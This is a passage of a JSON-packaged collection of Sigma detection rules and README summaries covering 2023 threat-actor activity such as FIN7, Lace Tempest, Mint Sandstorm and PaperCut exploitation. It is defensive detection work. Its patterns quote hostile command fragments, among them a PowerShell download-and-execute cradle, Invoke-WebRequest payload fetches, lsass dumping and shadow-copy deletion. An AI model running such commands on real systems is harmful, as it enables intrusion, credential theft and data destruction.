    "content": "title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity\nid: 911389c7-5ae3-43ea-bab3-a947ebdeb85e\nstatus: test\ndescription: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png\n    - https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.execution\n    - attack.g0046\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '-noni -nop -exe bypass -f \\\\\\\\'\n            - 'ADMIN$'\n    selection_2:\n        CommandLine|contains|all:\n            - '-ex bypass -noprof -nolog -nonint -f'\n            - 'C:\\Windows\\Temp\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/README.md",
    "content": "# Lace Tempest SysAid CVE-2023-47246 Exploitation\n\n## Summary\n\nA zero-day vulnerability in the SysAid on-premises software was exploited by DEV-0950 (Lace Tempest). Where the threat actor uploaded a WAR archive containing a WebShell and other payloads into the webroot of the SysAid Tomcat web service. The WebShell provided the attacker with unauthorized access and control over the affected system. Subsequently, the attacker utilized a PowerShell script, deployed through the WebShell, to execute a malware loader named user.exe on the compromised host, which was used to load the GraceWire trojan\n\nYou can find more information on the threat in the following articles:\n\n- [SysAid On-Prem Software CVE-2023-47246 Vulnerability](https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification)\n\n## Rules\n\n- [Lace Tempest File Indicators](./file_event_win_apt_lace_tempest_indicators.yml)\n- [Lace Tempest PowerShell Evidence Eraser](./posh_ps_apt_lace_tempest_eraser_script.yml)\n- [Lace Tempest PowerShell Launcher](./posh_ps_apt_lace_tempest_malware_launcher.yml)\n- [Lace Tempest Cobalt Strike Download](./proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml)\n- [Lace Tempest Malware Loader Execution](./proc_creation_win_apt_lace_tempest_loader_execution.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml",
    "content": "title: Lace Tempest File Indicators\nid: e94486ea-2650-4548-bf25-88cbd0bb32d7\nstatus: test\ndescription: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|endswith:\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe'\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war'\n              - ':\\Program Files\\SysAidServer\\tomcat\\webapps\\leave'\n        - TargetFilename|contains: ':\\Program Files\\SysAidServer\\tomcat\\webapps\\user.'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_eraser_script.yml",
    "content": "title: Lace Tempest PowerShell Evidence Eraser\nid: b377ddab-502d-4519-9e8c-5590033d2d70\nstatus: test\ndescription: |\n    Detects a PowerShell script used by Lace Tempest APT to erase evidence from victim servers by exploiting CVE-2023-47246 as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'cleanLL'\n            - 'usersfiles.war'\n            - 'Remove-Item -Path \"$tomcat_dir'\n            - 'SysAidServer'\n            - 'sleep '\n            - 'while(1)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/posh_ps_apt_lace_tempest_malware_launcher.yml",
    "content": "title: Lace Tempest PowerShell Launcher\nid: 37dc5463-f7e3-4f61-ad76-ba59cd02a651\nstatus: test\ndescription: |\n    Detects a PowerShell script used by Lace Tempest APT to launch their malware loader by exploiting CVE-2023-47246 as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '\\SysAidServer\\tomcat\\webapps'\n            - 'Starting user.exe'\n            - '\\usersfiles\\user.exe'\n            - 'Remove-Item -Force \"$wapps'\n            - '(Sophos).'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml",
    "content": "title: Lace Tempest Cobalt Strike Download\nid: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d\nstatus: test\ndescription: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(\n            - /a')\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml",
    "content": "title: Lace Tempest Malware Loader Execution\nid: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d\nstatus: test\ndescription: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team\nreferences:\n    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-09\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: ':\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe'\n    selection_hash:\n        Hashes|contains: 'SHA256=B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lazarus/README.md",
    "content": "# Lazarus APT\n\nLast Updated: 18/10/2023\n\n## Summary\n\nESET researchers have uncovered a Lazarus attack against an aerospace company in Spain, where the group deployed several tools, most notably a publicly undocumented backdoor that ESET is naming LightlessCan. Lazarus operators obtained initial access to the company’s network last year after a successful spearphishing campaign, masquerading as a recruiter for Meta – the company behind Facebook, Instagram, and WhatsApp. Four different execution chains were identified, delivering three types of payloads via DLL side-loading.\n\nYou can find more information on the threat in the following articles:\n\n- [Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company](https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/)\n- [Lazarus hackers breach aerospace firm with new LightlessCan malware](https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/)\n\n## Rules\n\n- [Lazarus APT DLL Sideloading Activity](./image_load_apt_lazarus_side_load_activity.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml",
    "content": "title: Lazarus APT DLL Sideloading Activity\nid: 24007168-a26b-4049-90d0-ce138e13a5cf\nstatus: test\ndescription: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company\nreferences:\n    - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/\n    - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/\nauthor: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-18\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1574.001\n    - attack.g0032\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: image_load\ndetection:\n    selection_mscoree:\n        Image: 'C:\\ProgramShared\\PresentationHost.exe'\n        ImageLoaded: ':\\ProgramShared\\mscoree.dll'\n    selection_colorui:\n        Image: 'C:\\ProgramData\\Adobe\\colorcpl.exe'\n        ImageLoaded: 'C:\\ProgramData\\Adobe\\colorui.dll'\n    selection_mapistub:\n        Image: 'C:\\ProgramData\\Oracle\\Java\\fixmapi.exe'\n        ImageLoaded: 'C:\\ProgramData\\Oracle\\Java\\mapistub.dll'\n    selection_hid:\n        Image: 'C:\\ProgramData\\Adobe\\ARM\\tabcal.exe'\n        ImageLoaded: 'C:\\ProgramData\\Adobe\\ARM\\HID.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/README.md",
    "content": "# Mint Sandstorm / PHOSPHORUS\n\nLast Updated: 20/04/2023\n\n## Summary\n\nOn April 18th 2023 Microsoft Threat Intelligence team reported on a new nation state activity they're tracking as Mint Sandstorm (previously tracked as PHOSPHORUS).\n\nYou can find more information on the threat in the following articles:\n\n- [Nation-state threat actor Mint Sandstorm refines tradecraft to attack high-value targets](https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/)\n\n## Rules\n\n- [Mint Sandstorm - AsperaFaspex Suspicious Process Execution](./proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml)\n- [Mint Sandstorm - Log4J Wstomcat Process Execution](./proc_creation_win_apt_mint_sandstorm_log4J_wstomcat_execution.yml)\n- [Mint Sandstorm - ManageEngine Suspicious Process Execution](./proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml",
    "content": "title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution\nid: 91048c0d-5b81-4b85-a099-c9ee4fb87979\nstatus: test\ndescription: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|contains|all:\n            - 'aspera'\n            - '\\ruby'\n    selection_special_child_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n    selection_special_child_powershell_cli:\n        - CommandLine|contains:\n              - ' echo '\n              - '-dumpmode'\n              - '-ssh'\n              - '.dmp'\n              - 'add-MpPreference'\n              - 'adscredentials'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'csvhost.exe'\n              - 'DownloadFile'\n              - 'DownloadString'\n              - 'dsquery'\n              - 'ekern.exe'\n              - 'FromBase64String'\n              - 'iex '\n              - 'iex('\n              - 'Invoke-Expression'\n              - 'Invoke-WebRequest'\n              - 'localgroup administrators'\n              - 'o365accountconfiguration'\n              - 'samaccountname='\n              - 'set-MpPreference'\n              - 'svhost.exe'\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'usoprivate'\n              - 'usoshared'\n              - 'whoami'\n        - CommandLine|re:\n              - '[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}'\n              - 'net\\s+user'\n              - 'net\\s+group'\n              - 'query\\s+session'\n    selection_special_child_lsass_1:\n        CommandLine|contains: 'lsass'\n    selection_special_child_lsass_2:\n        CommandLine|contains:\n            - 'procdump'\n            - 'tasklist'\n            - 'findstr'\n    selection_child_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains: 'http'\n    selection_child_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: 'http'\n    selection_child_script:\n        CommandLine|contains:\n            - 'E:jscript'\n            - 'e:vbscript'\n    selection_child_localgroup:\n        CommandLine|contains|all:\n            - 'localgroup Administrators'\n            - '/add'\n    selection_child_net:\n        CommandLine|contains: 'net' # Covers net1\n        CommandLine|contains|all:\n            - 'user'\n            - '/add'\n    selection_child_reg:\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableAntiSpyware'\n              - '\\Microsoft\\Windows Defender'\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableRestrictedAdmin'\n              - 'CurrentControlSet\\Control\\Lsa'\n    selection_child_wmic_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'process call create'\n    selection_child_wmic_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'delete'\n            - 'shadowcopy'\n    selection_child_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin'\n            - 'delete'\n            - 'shadows'\n    selection_child_wbadmin:\n        CommandLine|contains|all:\n            - 'wbadmin'\n            - 'delete'\n            - 'catalog'\n    condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml",
    "content": "title: Mint Sandstorm - Log4J Wstomcat Process Execution\nid: 7c97c625-0350-4f0a-8943-f6cadc88125e\nstatus: test\ndescription: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2023-11-29\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ws_tomcatservice.exe'\n    filter_main_repadmin:\n        Image|endswith: '\\repadmin.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml",
    "content": "title: Mint Sandstorm - ManageEngine Suspicious Process Execution\nid: 58d8341a-5849-44cd-8ac8-8b020413a31b\nstatus: test\ndescription: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/\nauthor: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)\ndate: 2023-04-20\nmodified: 2025-10-19\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_path:\n        ParentImage|contains:\n            - 'manageengine'\n            - 'ServiceDesk'\n    selection_parent_image:\n        ParentImage|contains: '\\java'\n    selection_special_child_powershell_img:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n    selection_special_child_powershell_cli:\n        - CommandLine|contains:\n              - ' echo '\n              - '-dumpmode'\n              - '-ssh'\n              - '.dmp'\n              - 'add-MpPreference'\n              - 'adscredentials'\n              - 'bitsadmin'\n              - 'certutil'\n              - 'csvhost.exe'\n              - 'DownloadFile'\n              - 'DownloadString'\n              - 'dsquery'\n              - 'ekern.exe'\n              - 'FromBase64String'\n              - 'iex '\n              - 'iex('\n              - 'Invoke-Expression'\n              - 'Invoke-WebRequest'\n              - 'localgroup administrators'\n              - 'o365accountconfiguration'\n              - 'samaccountname='\n              - 'set-MpPreference'\n              - 'svhost.exe'\n              - 'System.IO.Compression'\n              - 'System.IO.MemoryStream'\n              - 'usoprivate'\n              - 'usoshared'\n              - 'whoami'\n        - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}'\n        - CommandLine|re: 'net\\s+user'\n        - CommandLine|re: 'net\\s+group'\n        - CommandLine|re: 'query\\ssession'\n    selection_special_child_lsass_1:\n        CommandLine|contains: 'lsass'\n    selection_special_child_lsass_2:\n        CommandLine|contains:\n            - 'procdump'\n            - 'tasklist'\n            - 'findstr'\n    selection_child_wget:\n        Image|endswith: '\\wget.exe'\n        CommandLine|contains: 'http'\n    selection_child_curl:\n        Image|endswith: '\\curl.exe'\n        CommandLine|contains: 'http'\n    selection_child_script:\n        CommandLine|contains:\n            - 'E:jscript'\n            - 'e:vbscript'\n    selection_child_localgroup:\n        CommandLine|contains|all:\n            - 'localgroup Administrators'\n            - '/add'\n    selection_child_net:\n        CommandLine|contains: 'net' # Covers net1\n        CommandLine|contains|all:\n            - 'user'\n            - '/add'\n    selection_child_reg:\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableAntiSpyware'\n              - '\\Microsoft\\Windows Defender'\n        - CommandLine|contains|all:\n              - 'reg add'\n              - 'DisableRestrictedAdmin'\n              - 'CurrentControlSet\\Control\\Lsa'\n    selection_child_wmic_1:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'process call create'\n    selection_child_wmic_2:\n        CommandLine|contains|all:\n            - 'wmic'\n            - 'delete'\n            - 'shadowcopy'\n    selection_child_vssadmin:\n        CommandLine|contains|all:\n            - 'vssadmin'\n            - 'delete'\n            - 'shadows'\n    selection_child_wbadmin:\n        CommandLine|contains|all:\n            - 'wbadmin'\n            - 'delete'\n            - 'catalog'\n    filter_main:\n        CommandLine|contains|all:\n            - 'download.microsoft.com'\n            - 'manageengine.com'\n            - 'msiexec'\n    condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/README.md",
    "content": "# Mustang Panda’s Campaign Against Australia\n\n## Summary\n\nThe Lab52 team has already detected the possibility that actors associated with China, especially Mustang Panda, could carry out attacks against the Australian government.\n\nLab52 has found a zip file named Biography of Senator the Hon Don Farrell.zip. Hon Don Farrell is the current Australian Secretary of State for Trade and Tourism, indicating a targeted campaign against Australia.\n\nYou can find more information on the threat in the following articles:\n\n- [New Mustang Panda’s campaign against Australia](https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/)\n\n## Rules\n\n- [Potential APT Mustang Panda Activity Against Australian Gov](./proc_creation_win_apt_mustang_panda_indicators.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Mustang-Panda-Australia-Campaign/proc_creation_win_apt_mustang_panda_indicators.yml",
    "content": "title: Potential APT Mustang Panda Activity Against Australian Gov\nid: 7806bb49-f653-48d3-a915-5115c1a85234\nstatus: test\ndescription: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52\nreferences:\n    - https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.execution\n    - attack.g0129\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - 'copy SolidPDFCreator.dll'\n            - 'C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll'\n    selection_2:\n        CommandLine|contains|all:\n            - 'reg '\n            - '\\Windows\\CurrentVersion\\Run'\n            - 'SolidPDF'\n            - 'C:\\Users\\Public\\Libraries\\PhotoTvRHD\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Okta-Support-System-Breach/README.md",
    "content": "# Okta Support System Breach\n\n## Summary\n\nOn October 19th Okta Security has identified adversarial activity that leveraged access to a stolen credential to access Okta's support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases.\n\nYou can find more information on the threat in the following articles:\n\n- [Tracking Unauthorized Access to Okta's Support System](https://sec.okta.com/harfiles)\n- [BeyondTrust Discovers Breach of Okta Support Unit](https://www.beyondtrust.com/blog/entry/okta-support-unit-breach)\n- [How Cloudflare mitigated yet another Okta compromise](https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/)\n\n## Rules\n\n- [Okta 2023 Breach Indicator Of Compromise](./okta_apt_suspicious_user_creation.yml.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Okta-Support-System-Breach/okta_apt_suspicious_user_creation.yml",
    "content": "title: Okta 2023 Breach Indicator Of Compromise\nid: 00a8e92a-776b-425f-80f2-82d8f8fab2e5\nstatus: test\ndescription: |\n    Detects new user account creation or activation with specific names related to the Okta Support System 2023 breach.\n    This rule can be enhanced by filtering out known and legitimate username used in your environnement.\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2023-10-25\nreferences:\n    - https://www.beyondtrust.com/blog/entry/okta-support-unit-breach\n    - https://developer.okta.com/docs/reference/api/event-types/\ntags:\n    - attack.credential-access\n    - detection.emerging-threats\nlogsource:\n    service: okta\n    product: okta\ndetection:\n    selection:\n        eventtype:\n            - 'user.lifecycle.create'\n            - 'user.lifecycle.activate'\n        target.user.display.name|contains: 'svc_network_backup'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Onyx-Sleet/README.md",
    "content": "# Onyx Sleet APT\n\n## Summary\n\nOnyx Sleet (PLUTONIUM) is a North Korean nation-state threat actor that primarily targets defense and IT services organizations in South Korea, the United States, and India.\n\n- [Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability](https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/)\n\n## Rules\n\n- [Onyx Sleet APT File Creation Indicators](./file_event_win_apt_onyx_sleet_indicators.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Onyx-Sleet/file_event_win_apt_onyx_sleet_indicators.yml",
    "content": "title: Onyx Sleet APT File Creation Indicators\nid: 2fef4fd9-7206-40d1-b4f5-ad6441d0cd9b\nstatus: test\ndescription: Detects file creation activity that is related to Onyx Sleet APT activity\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-24\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: ':\\Windows\\ADFS\\bg\\inetmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/README.md",
    "content": "# PaperCut Print Management Exploitation\n\n## Summary\n\nOn the 21st of April 2023 the Huntress team reported an in-the-wild exploitation of zero-day vulnerabilities against PaperCut MF/NG they were tracking. Where attackers where exploiting CVE-2023-27351 and CVE-2023-27350.\n\nYou can find more information on the threat in the following articles:\n\n- [Critical Vulnerabilities in PaperCut Print Management Software](https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software)\n- [APRIL 19 UPDATE | PaperCut MF/NG vulnerability bulletin (March 2023)](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219)\n\n## Rules\n\n- [PaperCut MF/NG Exploitation Related Indicators](./proc_creation_win_papercut_print_management_exploitation_indicators.yml)\n- [PaperCut MF/NG Potential Exploitation](./proc_creation_win_papercut_print_management_exploitation_pc_app.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_indicators.yml",
    "content": "title: PaperCut MF/NG Exploitation Related Indicators\nid: de1bd0b6-6d59-417c-86d9-a44114aede3b\nstatus: test\ndescription: Detects exploitation indicators related to PaperCut MF/NG Exploitation\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n    - https://www.papercut.com/kb/Main/PO-1216-and-PO-1219\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-25\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - ' /c '\n            - 'powershell'\n            - '-nop -w hidden'\n            - 'Invoke-WebRequest'\n            - 'setup.msi'\n            - '-OutFile'\n    selection_2:\n        CommandLine|contains|all:\n            - 'msiexec '\n            - '/i '\n            - 'setup.msi '\n            - '/qn '\n            - 'IntegratorLogin=fimaribahundq'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/PaperCut-Print-Management-Exploitation/proc_creation_win_papercut_print_management_exploitation_pc_app.yml",
    "content": "title: PaperCut MF/NG Potential Exploitation\nid: 0934ac71-a331-4e98-a034-d49c491fbbcb\nstatus: test\ndescription: Detects suspicious child processes of \"pc-app.exe\". Which could indicate potential exploitation of PaperCut\nreferences:\n    - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software\n    - https://github.com/huntresslabs/threat-intel/blob/3bad6b0fadfcca3ff5680923e74e39edd72f32da/2023/2023-04/20-PaperCut/win_susp_papercut_code_execution.yml\nauthor: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)\ndate: 2023-04-20\nmodified: 2023-04-25\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pc-app.exe'\n        Image|endswith:\n            - '\\bash.exe'\n            - '\\calc.exe'\n            - '\\certutil.exe'\n            - '\\cmd.exe'\n            - '\\csc.exe'\n            - '\\cscript.exe'\n            - '\\dllhost.exe'\n            - '\\mshta.exe'\n            - '\\msiexec.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\scriptrunner.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml",
    "content": "title: Peach Sandstorm APT Process Activity Indicators\nid: 2e7bbd54-2f26-476e-b4a1-ba5f1a012614\nstatus: test\ndescription: Detects process creation activity related to Peach Sandstorm APT\nreferences:\n    - https://twitter.com/MsftSecIntel/status/1737895710169628824\n    - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nauthor: X__Junior (Nextron Systems)\ndate: 2024-01-15\ntags:\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: 'QP''s\\*(58vaP!tF4'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/Peach-Sandstorm/proxy_apt_peach_sandstorm_falsefont_backdoor_c2_coms.yml",
    "content": "title: Potential Peach Sandstorm APT C2 Communication Activity\nid: b8225208-81d0-4715-a822-12bcdd583e0f\nstatus: test\ndescription: Detects potential C2 communication activity related to Peach Sandstorm APT\nreferences:\n    - https://twitter.com/MsftSecIntel/status/1737895710169628824\n    - https://www.virustotal.com/gui/file/364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614/details\nauthor: X__Junior (Nextron Systems)\ndate: 2024-01-15\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|endswith:\n            - '/api/Core/Command/Init'\n            - '/api/Core/Command/Restart'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation/README.md",
